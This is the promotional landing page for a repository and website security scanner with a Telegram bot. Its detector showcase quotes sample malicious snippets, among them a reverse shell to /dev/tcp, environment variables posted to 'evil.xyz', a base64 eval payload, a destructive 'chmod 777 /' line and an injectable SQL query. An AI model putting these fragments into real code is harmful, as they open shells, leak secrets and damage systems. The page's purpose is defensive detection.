SCANTHE CODEWITH AI.
Scan any GitHub repository or website URL for AI-generated code, hidden malware, and trust signals. Real-time analysis, threat detection, and confidence scoring — just paste a link.
Scan any GitHub repository or website URL for AI-generated code, hidden malware, and trust signals. Real-time analysis, threat detection, and confidence scoring — just paste a link.
LATENCY
< 0s
ACCURACY
0%
REPOS SCANNED
0+
LANGUAGES
0
AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.
OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.
Score repo owners 0-100 based on followers, stars, activity, and contribution history.
Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.
AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.
OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.
Score repo owners 0-100 based on followers, stars, activity, and contribution history.
Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.
AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.
OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.
Score repo owners 0-100 based on followers, stars, activity, and contribution history.
Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.
AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.
OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.
Score repo owners 0-100 based on followers, stars, activity, and contribution history.
Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.
Detect backdated commits, suspicious gaps, and burst activity in repo history.
Measures real development effort — file count, complexity, avg size, largest file analysis.
Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.
5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.
Detect backdated commits, suspicious gaps, and burst activity in repo history.
Measures real development effort — file count, complexity, avg size, largest file analysis.
Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.
5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.
Detect backdated commits, suspicious gaps, and burst activity in repo history.
Measures real development effort — file count, complexity, avg size, largest file analysis.
Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.
5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.
Detect backdated commits, suspicious gaps, and burst activity in repo history.
Measures real development effort — file count, complexity, avg size, largest file analysis.
Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.
5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.
Six steps to a full security report. Click any step to see live output.
Launch the layer.claw scan engine with a single command. It initializes the AI analysis pipeline, connects to the detection models, and prepares for scanning.
12 specialized detectors scan every file. Real findings from real scans.
Pattern match against ChatGPT, Copilot, and other AI signatures
matches src/utils/helpers.ts — style entropy 0.12, naming score 94%
Analyzes writing patterns, variable naming, comment style, and structural consistency to identify AI-authored files.
3xHidden reverse shell in postinstall script
matches scripts/setup.sh — exec /bin/bash -i >& /dev/tcp/...
Detects hidden remote access payloads, reverse shells, and trojan code disguised as legitimate utilities.
4xStealth XMRig miner embedded in worker thread
matches src/workers/compute.js — crypto.randomBytes + stratum://
Identifies mining scripts that hijack CPU/GPU resources, including pool connections and hash rate throttling.
2xEnvironment variables sent to external endpoint
matches src/config/init.ts — fetch('https://evil.xyz', {body: process.env})
Catches code that silently leaks secrets, cookies, private keys, or user data to unknown external servers.
3xUnescaped user input in SQL query builder
matches src/db/query.ts — `SELECT * FROM users WHERE id=${req.params.id}`
Scans for SQL injection, XSS, command injection, LDAP injection, and other input validation failures.
5xAWS access key exposed in source code
matches src/config/aws.ts — AKIA... (20 char key pattern)
Detects API keys, passwords, tokens, private keys, and credentials committed directly to source code.
3xBase64-encoded eval() payload in dependency
matches node_modules/help-util/index.js — eval(atob('...'))
Flags intentionally unreadable code: base64 payloads, hex-encoded strings, packed/minified malware.
2xMD5 used for password hashing
matches src/auth/hash.ts — crypto.createHash('md5')
Identifies broken encryption, deprecated algorithms, insecure random generation, and weak hashing.
2xOutbound request to unknown domain on startup
matches src/init.ts — fetch('https://unknown-domain.xyz/ping')
Detects unexpected outbound connections, hidden webhooks, DNS exfiltration, and suspicious API calls.
3xSubprocess spawns root shell via sudo
matches scripts/install.sh — sudo chmod 777 / && exec bash
Catches code that attempts to gain elevated permissions, exploit SUID binaries, or bypass access controls.
2xKnown CVE in lodash@4.17.20
matches package.json — CVE-2021-23337 (prototype pollution)
Checks package manifests against CVE databases, flags typosquatted modules and supply chain risks.
1xPath traversal in file upload handler
matches src/api/upload.ts — path.join(dir, req.body.filename)
Detects unauthorized file reads/writes, directory traversal exploits, symlink attacks, and temp file abuse.
2x...and dozens more patterns across supply chain attacks, deserialization, prototype pollution, and other emerging threats.
Scan any website for trust signals — not just GitHub repos. Built for crypto users vetting projects before connecting their wallet.
in the dashboard, type
npm run web.claw
Every project scanned by Github Claw and Web Claw — visualized as an interactive network graph. Nodes colored by threat level, connected by category.
Click any node to see its security summary, threat level, category, and full scan results. Filter by category to explore specific sectors.
Integrate Layer Claw scanning into your workflow. Choose your plan and pay with crypto.
For individual developers who scan regularly.
For teams shipping production code daily.
For enterprises with custom security needs.
Explore the Layer Claw API documentation. Endpoints, authentication, response schemas, and integration guides — everything you need to build on top of Layer Claw.
View Documentation→Add the Layer Claw bot to your chat. Paste a GitHub link, get a full security report — without leaving Telegram.
Direct message scanning
Message the bot directly with any GitHub repository URL. It opens a mini terminal inside Telegram — same scanning engine, same results, zero setup.
PRO plan feature
Add Layer Claw to your team's Telegram group. Anyone can paste a repo link and the bot auto-scans it — keeping your entire team protected in real time.
Three minds. One mission. Zero tolerance for bad code.

Lead Threat Architect
Spent 8 years hunting APTs across Fortune 500 networks. Now she builds the scanners that hunt them back.

Head of Detection Systems
Wrote his first malware classifier at 16. His pattern engines catch obfuscated threats that fool every other tool.

Chief of AI Security
Former blockchain security researcher. Pioneered AI-driven smart contract auditing before it was a category.
Think you belong in the tank?
Apply Now